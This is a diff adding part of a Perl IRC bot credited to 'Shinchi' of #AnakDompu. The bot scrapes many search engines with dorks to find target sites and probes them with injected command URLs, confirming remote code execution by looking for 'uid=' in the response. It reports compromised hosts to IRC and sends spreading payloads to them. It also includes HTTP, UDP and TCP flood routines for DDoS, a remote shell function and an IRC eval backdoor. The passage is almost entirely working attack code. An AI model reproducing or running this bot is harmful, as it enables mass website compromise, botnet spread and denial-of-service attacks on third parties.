+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1MozBot]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1MozBot]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /AnakDompu/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1MaZbot]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print");
+  sendraw($IRC_cur_socket, "PRIVMSG Shinchi :Uname:6 $type Vuln:10 $print");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+my $cinta="http://".$sito.$bug.$perawan."?";
+my $kasih=HTTP::Request->new(GET=>$cinta);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($kasih);
+}}
+elsif($re =~ /AnakDompu/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1MaZBot]11,10[1ON] 13,6[1TaRgEt]7,1 $print");
+my $test2="http://".$sito.$bug.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### AOL
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @aollist=&aol($dork);
+	my @aollista=&aola($dork);
+	my @aollistb=&aolb($dork);
+	my @aollistc=&aolc($dork);
+push(my @aolbyp,@aollist, @aollista, @aollistb, @aollistc );
+push(my @tot, @aolbyp);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1AOL]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1AOL]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /AnakDompu/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1AOL]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print");
+  sendraw($IRC_cur_socket, "PRIVMSG Shinchi :Uname:6 $type Vuln:10 $print");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+my $cinta="http://".$sito.$bug.$perawan."?";
+my $kasih=HTTP::Request->new(GET=>$cinta);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($kasih);
+}}
+elsif($re =~ /AnakDompu/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1AOL]11,10[1ON] 13,6[1TaRgEt]7,1 $print");
+my $test2="http://".$sito.$bug.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### ASK
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @asklist=&ask($dork);
+	my @asklista=&aska($dork);
+	my @asklistb=&askb($dork);
+push(my @tot, @asklist, @asklista, @asklistb);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1ASK]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1ASK]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /AnakDompu/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1ASK]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print");
+  sendraw($IRC_cur_socket, "PRIVMSG Shinchi :Uname:6 $type Vuln:10 $print");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+my $cinta="http://".$sito.$bug.$perawan."?";
+my $kasih=HTTP::Request->new(GET=>$cinta);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($kasih);
+}}
+elsif($re =~ /AnakDompu/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1ASK]11,10[1ON] 13,6[1TaRgEt]7,1 $print");
+my $test2="http://".$sito.$bug.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################
+#End of EExPreSiSCANNER#
+##################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ	 #
+# 	  www.AnakDompu.by.ru		 	 #
+#	     Created By Shinchi			 #
+#		 #AnakDompu			 #
+#		irc.dal.net			 #
+##################################################
+######################
+if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Http DDoS] 13,6[1HaJaR] 10 ".$1." 11,10[1Pada Port 80 Untuk] 12 ".$2." Detik .");
+my $itime = time;
+my ($cur_time);
+$cur_time = time - $itime;
+while ($2>$cur_time){
+$cur_time = time - $itime;
+my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
+print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
+close($socket);
+}
+sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Http DDoS] 13,6[1HaJaR SeLeSaI] 7 ".$1.".");
+}
+######################
+#  End of HTTPFlood  #
+##################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ	 #
+# 	  www.AnakDompu.by.ru		 	 #
+#	     Created By Shinchi			 #
+#		 #AnakDompu			 #
+#		irc.dal.net			 #
+##################################################
+#     UDPFlood       #
+######################
+if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Udp DDoS] 13,6[1HaJaR]12 ".$1." with 12 ".$2." Kb Packets for 12 ".$3." detik.");
+my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
+$dtime = 1 if $dtime == 0;
+my %bytes;
+$bytes{igmp} = $2 * $pacotes{igmp};
+$bytes{icmp} = $2 * $pacotes{icmp};
+$bytes{o} = $2 * $pacotes{o};
+$bytes{udp} = $2 * $pacotes{udp};
+$bytes{tcp} = $2 * $pacotes{tcp};
+sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Udp DDoS] 13,6[1HaSiL]12 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in12 ".$dtime." seconds to12 ".$1.".");
+}
+exit;
+}
+}
+######################
+#  End of Udpflood   #
+######################
+
+
+sub ircase {
+my ($kem, $printl, $case) = @_;
+  if ($case =~ /^join (.*)/) {
+     j("$1");
+   }
+   if ($case =~ /^part (.*)/) {
+      p("$1");
+   }
+if ($case =~ /^rejoin\s+(.*)/) {
+my $chan = $1;
+if ($chan =~ /^(\d+) (.*)/) {
+for (my $ca = 1; $ca <= $1; $ca++ ) {
+p("$2");
+j("$2");
+}
+}
+else {
+p("$chan");
+j("$chan");
+}
+}
+
+if ($case =~ /^op/) {
+op("$printl", "$kem") if $case eq "op";
+my $oarg = substr($case, 3);
+op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+}
+
+if ($case =~ /^deop/) {
+deop("$printl", "$kem") if $case eq "deop";
+my $oarg = substr($case, 5);
+deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+}
+
+if ($case =~ /^msg\s+(\S+) (.*)/) {
+msg("$1", "$2");
+}
+
+if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
+for (my $cf = 1; $cf <= $1; $cf++) {
+msg("$2", "$3");
+}
+}
+
+if ($case =~ /^ctcp\s+(\S+) (.*)/) {
+ctcp("$1", "$2");
+}
+
+if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
+for (my $cf = 1; $cf <= $1; $cf++) {
+ctcp("$2", "$3");
+}
+}
+
+if ($case =~ /^nick (.*)/) {
+nick("$1");
+}
+
+if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
+conectar("$2", "$1", 6667);
+}
+
+if ($case =~ /^raw (.*)/) {
+sendraw("$1");
+}
+
+if ($case =~ /^eval (.*)/) {
+eval "$1";
+}
+}
+
+
+sub shell {
+my $printl=$_[0];
+my $comando=$_[1];
+if ($comando =~ /cd (.*)/) {
+chdir("$1") || msg("$printl", "No such file or directory");
+return;
+}
+
+elsif ($pid = fork) {
+waitpid($pid, 0);
+}
+else {
+if (fork) {
+exit;
+
+} else {
+my @resp=`$comando 2>&1 3>&1`;
+my $c=0;
+foreach my $linha (@resp) {
+  $c++;
+  chop $linha;
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
+  if ($c == "$linas_max") {
+    $c=0;
+    sleep $sleep;
+  }
+}
+exit;
+}
+}
+}
+
+sub tcpflooder {
+my $itime = time;
+my ($cur_time);
+my ($ia,$pa,$proto,$j,$l,$t);
+$ia=inet_aton($_[0]);
+$pa=sockaddr_in($_[1],$ia);
+$ftime=$_[2];
+$proto=getprotobyname('tcp');
+$j=0;$l=0;
+$cur_time = time - $itime;
+while ($l<1000){
+$cur_time = time - $itime;
+last if $cur_time >= $ftime;
+$t="SOCK$l";
+socket($t,PF_INET,SOCK_STREAM,$proto);
+connect($t,$pa)||$j--;
+$j++;$l++;
+}
+$l=0;
+while ($l<1000){
+$cur_time = time - $itime;
+last if $cur_time >= $ftime;
+$t="SOCK$l";
+shutdown($t,2);
+$l++;
+}
+}
+
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+# % AnakDompu ExPreSi Scanner Bot  %
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+
+sub udpflooder {
+my $iaddr = inet_aton($_[0]);
+my $msg = 'A' x $_[1];
+my $ftime = $_[2];
+my $cp = 0;
+my (%pacotes);
+$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
+socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
+socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
+socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
+socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
+return(undef) if $cp == 4;
+my $itime = time;
+my ($cur_time);
+while ( 1 ) {
+for (my $porta = 1;
+$porta <= 65000; $porta++) {
+$cur_time = time - $itime;
+last if $cur_time >= $ftime;
+send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
+send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
+send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
+send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
+
+
+for (my $pc = 3;
+$pc <= 255;$pc++) {
+next if $pc == 6;
+$cur_time = time - $itime;
+last if $cur_time >= $ftime;
+socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
+send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
+}
+}
+last if $cur_time >= $ftime;
+}
+return($cur_time, %pacotes);
+}
+
+sub ctcp {
+return unless $#_ == 1;
+sendraw("PRIVMSG $_[0] :\001$_[1]\001");
+}
+
+sub msg {
+return unless $#_ == 1;
+sendraw("PRIVMSG $_[0] :$_[1]");
+}
+
+sub notice {
+return unless $#_ == 1;
+sendraw("NOTICE $_[0] :$_[1]");
+}
+
+sub op {
+return unless $#_ == 1;
+sendraw("MODE $_[0] +o $_[1]");
+}
+
+sub deop {
+return unless $#_ == 1;
+sendraw("MODE $_[0] -o $_[1]");
+}
+
+sub j {
+&join(@_);
+}
+
+sub join {
+return unless $#_ == 0;
+sendraw("JOIN $_[0]");
+
+}
+sub p { part(@_);
+}
+
+sub part {
+sendraw("PART $_[0]");
+}
+
+sub nick {
+return unless $#_ == 0;
+sendraw("NICK $_[0]");
+}
+
+sub quit {
+sendraw("QUIT :$_[0]");
+}
+
+#####
+# SUBS GOOGLE
+#####
+sub googlet {
+my @dominios = ("ae","com.ar","at","com.au","be","com.br","ca","ch","cl","de","dk");
+my @country = ("AE","AR","AT","AU","BE","BR","CA","CH","CL","DE","DK");
+my @lang = ("en","es","de","nl","pt-BR","it","de","fo","sv","fr","el");
+my @lst;
+my $key=key($_[0]);
+my $c=0;
+foreach my $i (@dominios){
+my @lista = google($i,$key,$lang[$c],$country[$c]);
+push(@lst,@lista);
+$c++;
+}
+return @lst;
+}
+
+sub google(){
+my @lst;
+my $i=$_[0];
+my $key=$_[1];
+my $lang= $_[2];
+my $country =$_[3];
+for($b=0;$b<=5000;$b+=100){
+my $Go=("www.google.".$i."/search?hl=".$lang."&q=".key($key)."&num=100&start=".$b."&meta=cr%3Dcountry".$country);
+my $Res=query($Go);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if ($1 !~ /google/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# SUBS AllTheWeb
+#####
+
+sub allthewebt {
+my @lang = ("en","es","de","nl","pt-BR","it","de","fo");
+my @lst;
+my $key=key($_[0]);
+my $c=0;
+foreach my $lang (@lang){
+my @lista = alltheweb($key,$lang[$c]);
+push(@lst,@lista);
+$c++;
+}
+return @lst;
+}
+
+
+sub alltheweb(){
+my @lista;
+my $key = $_[0];
+my $lang= $_[1];
+for($b=0;$b<=500;$b+=100){
+my $alltheweb=("http://www.alltheweb.com/search?cat=web&_sb_lang=".$lang."&hits=100&q=".key($key)."&o=".$b);
+my $Res=query($alltheweb);
+while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub standard()
+{
+my @lst;
+my $key=$_[0];
+my $i=0;
+my $pg=0;
+for($i=0; $i<=1000; $i+=100)
+{
+my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
+my $Res=query($all);
+while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+#####
+# SUBS Lycos
+#####
+sub lycos(){
+my @lst;
+my $key = $_[0];
+for($b=0;$b<=1000;$b+=100){
+my $ly=("http://search.lycos.com/?query=".key($key)."&page=$av".$b);
+my $Res=query($ly);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if ($1 !~ /msn|live|google|yahoo/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# SUBS Yahoo
+#####
+sub yahoo(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=100){
+my $Ya=("http://br.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b);
+my $Res=query($Ya);
+while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/<b>//g;
+$k=~s/<\/b>//g;
+$k=~s/<wbr>//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub yahooa(){
+my @lst;
+my $key = $_[0];
+for($b=210;$b<=1000;$b+=210){
+my $Ya=("http://be.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b);
+my $Res=query($Ya);
+while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/<b>//g;
+$k=~s/<\/b>//g;
+$k=~s/<wbr>//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub yahoob(){
+my @lst;
+my $key = $_[0];
+for($b=410;$b<=1000;$b+=210){
+my $Ya=("http://us.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b);
+my $Res=query($Ya);
+while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/<b>//g;
+$k=~s/<\/b>//g;
+$k=~s/<wbr>//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub yahooc(){
+my @lst;
+my $key = $_[0];
+for($b=610;$b<=1000;$b+=210){
+my $Ya=("http://it.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b);
+my $Res=query($Ya);
+while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/<b>//g;
+$k=~s/<\/b>//g;
+$k=~s/<wbr>//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub yahood(){
+my @lst;
+my $key = $_[0];
+for($b=810;$b<=1000;$b+=210){
+my $Ya=("http://de.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b);
+my $Res=query($Ya);
+while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/<b>//g;
+$k=~s/<\/b>//g;
+$k=~s/<wbr>//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+#####
+# SUBS MSN
+#####
+sub msn(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=10){
+my $MsN=("http://search.live.com/results.aspx?q=".key($key)."&first=".$b."&FORM=PERE");
+my $Res=query($MsN);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if($1 !~ /msn|live/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# SUBS SEARCH
+#####
+sub search(){
+my @lst;
+my $key = $_[0];
+for($b=0;$b<=1000;$b+=100){
+my $ser=("http://www.search.com/search?q=".key($key)."".$b);
+my $Res=query($ser);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if ($1 !~ /msn|live|google|yahoo/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# SUBS FireBall
+#####
+sub fireball(){
+my $key=$_[0];
+my $inizio=1;
+my $pagine=200;
+my @lst;
+my $av=0;
+while($inizio <= $pagine){
+my $fireball="http://suche.fireball.de/cgi-bin/pursuit?pag=$av&query=".key($key)."&cat=fb_loc&idx=all&enc=utf-8";
+my $Res=query($fireball);
+while ($Res=~ m/<a href=\"?http:\/\/(.+?)\//g ){
+if ($1 !~ /msn|live|google|yahoo/){
+my $k="$1/";
+my @grep=links($k);
+push(@lst,@grep);
+}}
+$av=$av+10;
+$inizio++;
+}
+return @lst;
+}
+
+#####
+# SUBS UOL
+#####
+sub uol(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=10){
+my $UoL=("http://busca.uol.com.br/www/index.html?q=".key($key)."&start=".$i);
+my $Res=query($UoL);
+while($Res =~ m/<a href=\"http:\/\/([^>\"]*)/g){
+my $k=$1;
+if($k!~/busca|uol|yahoo/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# Altavista
+#####
+sub altavista(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=10){
+my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b);
+my $Res=query($AlT);
+while($Res=~m/<span class=ngrn>(.+?)\//g){
+if($1 !~ /altavista/){
+my $k=$1;
+$k=~s/<//g;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+sub altavistade(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=10){
+my $AlT=("http://de.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b);
+my $Res=query($AlT);
+while($Res=~m/<span class=ngrn>(.+?)\//g){
+if($1 !~ /altavista/){
+my $k=$1;
+$k=~s/<//g;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+sub altavistaus(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=10){
+my $AlT=("http://us.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b);
+my $Res=query($AlT);
+while($Res=~m/<span class=ngrn>(.+?)\//g){
+if($1 !~ /altavista/){
+my $k=$1;
+$k=~s/<//g;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# HotBot
+#####
+sub hotbot(){
+my @lst;
+my $key = $_[0];
+for($b=0;$b<=1000;$b+=100){
+my $hot=("http://search.hotbot.de/cgi-bin/pursuit?pag=$av&query=".key($key)."&cat=hb_loc&enc=utf-8".$b);
+my $Res=query($hot);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if ($1 !~ /msn|live|google|yahoo/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+sub hotbotb(){
+my @lst;
+my $key = $_[0];
+for($b=0;$b<=1000;$b+=100){
+my $hot=("http://search.hotbot.co.uk/cgi-bin/pursuit?pag=$av&query=".key($key)."&cat=hb_loc&enc=utf-8".$b);
+my $Res=query($hot);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if ($1 !~ /msn|live|google|yahoo/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# Mamma
+#####
+sub mamma(){
+my @lst;
+my $key = $_[0];
+for($b=0;$b<=1000;$b+=100){
+my $mam=("http://www.mamma.com/Mamma?utfout=$av&qtype=0&query=".key($key)."".$b);
+my $Res=query($mam);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if ($1 !~ /msn|live|google|yahoo/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# MozBot
+#####
+sub mozbot()
+{
+my @lst;
+my $key=$_[0];
+my $i=0;
+my $pg=0;
+for($i=0; $i<=100; $i+=1){
+my $mozbot=("http://www.mozbot.fr/search?q=".key($key)."&st=int&page=".$i);
+my $Res=query($mozbot);
+while($Res =~ m/<a href=\"?http:\/\/(.+?)\" target/g){
+my $k=$1;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub mozbota()
+{
+my @lst;
+my $key=$_[0];
+my $i=0;
+my $pg=0;
+for($i=0; $i<=100; $i+=1){
+my $mozbot=("http://www.mozbot.co.uk/search?q=".key($key)."&st=int&page=".$i);
+my $Res=query($mozbot);
+while($Res =~ m/<a href=\"?http:\/\/(.+?)\" target/g){
+my $k=$1;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub mozbotb()
+{
+my @lst;
+my $key=$_[0];
+my $i=0;
+my $pg=0;
+for($i=0; $i<=100; $i+=1){
+my $mozbot=("http://www.mozbot.com/search?q=".key($key)."&st=int&page=".$i);
+my $Res=query($mozbot);
+while($Res =~ m/<a href=\"?http:\/\/(.+?)\" target/g){
+my $k=$1;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+#####
+# SUBS AOL
+#####
+sub aol(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=100;$b++){
+my $AoL=("http://search.aol.co.uk/aol/search?query=".key($key)."&page=".$b."&nt=null&ie=UTF-8");
+my $Res=query($AoL);
+while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub aola(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=59;$b+=1){
+my $AoL=("http://205.188.99.136/aol/search?query=".key($key)."&page=".$b."&count_override=20&lr=lang_en");
+my $Res=query($AoL);
+while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub aolb(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=59;$b+=1){
+my $AoL=("http://search.aol.com/aol/search?query=".key($key)."&page=".$b."&count_override=20&lr=lang_de");
+my $Res=query($AoL);
+while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub aolc(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=59;$b+=1){
+my $AoL=("http://64.12.129.44/aol/search?query=".key($key)."&page=".$b."&count_override=20&lr=lang_fr");
+my $Res=query($AoL);
+while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+#####
+# SUBS ASK
+#####
+sub ask(){
+my @lst;
+my $key=$_[0];
+my $i=0;
+my $pg=0;
+for($i=0; $i<=1000; $i+=10)
+{
+my $Ask=("http://it.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all");
+my $Res=query($Ask);
+while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){
+my $k=$3;
+$k=~s/[\"\ ]//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub aska(){
+my @lst;
+my $key=$_[0];
+my $i=0;
+my $pg=0;
+for($i=0; $i<=1000; $i+=10)
+{
+my $Ask=("http://uk.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all");
+my $Res=query($Ask);
